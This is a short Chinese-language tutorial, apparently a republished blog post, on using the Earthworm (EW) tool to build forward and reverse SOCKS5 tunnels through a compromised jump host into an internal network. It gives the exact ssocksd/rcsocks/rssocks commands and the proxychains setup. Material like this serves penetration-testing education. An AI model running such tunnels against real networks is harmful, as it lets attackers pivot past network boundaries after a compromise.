Earthworm (EW) 做Socks5正向和反向代理穿透内网

admin 2022年4月23日08:58:25评论291 views字数 572阅读1分54秒阅读模式

Earthworm (EW) 做Socks5正向和反向代理穿透内网


一、Earthworm (EW)简介


EW是一套便捷的网络穿透工具


工具支持多个平台,穿透模式分为正向代理和反向代理


该工具已经停止更新了,并且杀软都会报毒


二、EW使用


网络拓扑图

Earthworm (EW) 做Socks5正向和反向代理穿透内网

正向代理


假设拿下B服务器,将工具上传到B服务器上使用


跳板机执行命令


ew_for_Win.exe -s ssocksd -l 8888

Earthworm (EW) 做Socks5正向和反向代理穿透内网攻击机开立开启代理


vim /etc/proxychains.conf
//这里填写的IP是跳板机的IP地址和跳板机上设置的端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

成功访问内网机器的80端口


proxychains curl http://10.10.10.132:80

Earthworm (EW) 做Socks5正向和反向代理穿透内网

反向代理

先在B机器上执行命令

ew_for_Win.exe -s rcsocks -l 7766 -e 6677
//跳板机监听7766端口并把流量走6677端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

再在C机器上执行命令

ew_for_Win.exe -s rssocks -d 10.10.10.133 -e 6677
//内网机器连接10.10.10.133的6677端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

攻击机开启代理

vim /etc/proxychains.conf
//本地机器做代理,流量走跳板机的7766端口,就可以访问到C内网

Earthworm (EW) 做Socks5正向和反向代理穿透内网

成功访问

Earthworm (EW) 做Socks5正向和反向代理穿透内网

代理后的拓扑图Earthworm (EW) 做Socks5正向和反向代理穿透内网


原文始发于微信公众号(Nurburgring):Earthworm (EW) 做Socks5正向和反向代理穿透内网

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日08:58:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Earthworm (EW) 做Socks5正向和反向代理穿透内网http://cn-sec.com/archives/872664.html

发表评论

匿名网友 填写信息